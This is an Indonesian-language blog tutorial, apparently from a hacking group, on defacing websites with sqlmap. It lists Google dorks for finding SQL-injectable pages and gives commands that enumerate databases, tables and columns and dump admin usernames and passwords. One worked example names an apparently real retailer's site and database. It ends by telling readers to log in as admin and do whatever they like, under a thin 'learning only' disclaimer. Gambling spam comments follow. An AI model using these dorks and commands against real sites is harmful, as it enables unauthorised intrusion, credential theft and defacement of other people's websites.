Deface Website Menggunakan SQLMAP
sebelum melakukan hacking jangan lupa siapkan target yang sudah vuln terhadap sql injection
bisa mencarinya dengan google dork atau menggunakan uniscan , owasp-zap, nikto , vega dll
bisa mencarinya dengan google dork atau menggunakan uniscan , owasp-zap, nikto , vega dll
google dork dibawah ini
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
jika sudah mendapatkan target
1. buka terminal
jika ingin melihat option pada sqlmap
ketik dengan perintah : sqlmap -h
jika ingin melihat option pada sqlmap
ketik dengan perintah : sqlmap -h
![](https://1.bp.blogspot.com/-sQRSV7kOcwA/V480e18Jd6I/AAAAAAAAADk/cJSfpiSHyc8diRORhwZtK3HdX22eyK7tgCEw/s640/1.png)
2. untuk melakukan hacking berikan perintah :
sqlmap -u http://www.target.com/syntaxerrorr=2
disini menandakan bahwa website tersebut vuln & jika ada pesan berikut tekan y lalu enter
di dalam kasus saya, saya mendapatkan 2 buah database & copy database tersebut untuk melanjutkan sql
3. lanjutkan lagi dengan perintah
untuk melihat isi tables
sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target –tables
CONTOH: sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb –tables
bisa langsung lompat untuk melihat columns dengan perintah
sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target –columns
CONTOH : sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb –columns
tetapi dalam kasus saya , saya lupa untuk menggunakan columns
hehehe
oke gak apa-apa kita lanjutkan saja
hehehe
oke gak apa-apa kita lanjutkan saja
4. Disini saya sudah mendapatkan tabel serta daftar dari website tersebut
cari table atau columns yang berisikan nama user / admin / password atau apalah yang terhubung dengan username / password
cari table atau columns yang berisikan nama user / admin / password atau apalah yang terhubung dengan username / password
5. saatnya mencari password & user admin
dengan perintah :
sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target -T admin –dump
CONTOH: sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb -T bz_admin –dump
dan secara otomatis sqlmap akan mencari user & password admin yang tersimpan pada website tersebut
6. cari halaman login admin website tersebut & masukan username & password yang telah kita dapatkan
7. LOGIN ^_^
8. masuk ke dalam directory & kalian bebas melakukan apapun pada website tersebut
INI HANYA PEMBELAJARAN
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN TERHADAP WEBSITE ORANG LAIN :v
Official : Red White Spirit Team
-DiffMuRis
-Mr.Robot
-[V]404_NOT_FOUND
-MR.P41J0
-DinzCanci
thanks gann , sangat membantu sekali ^.^
BalasHapusReview Agen Judi Online Terpercaya
Bonus Cashback Tertinggi
Bonus New Member SBOBET
Bandar Judi Bola Online Teraman
Agen Judi Slot Gaming Online Terbaik
Agen Live Casino Online Menguntungkan
Agen Capsa Susun Online Terpercaya
Judi Poker Online Resmi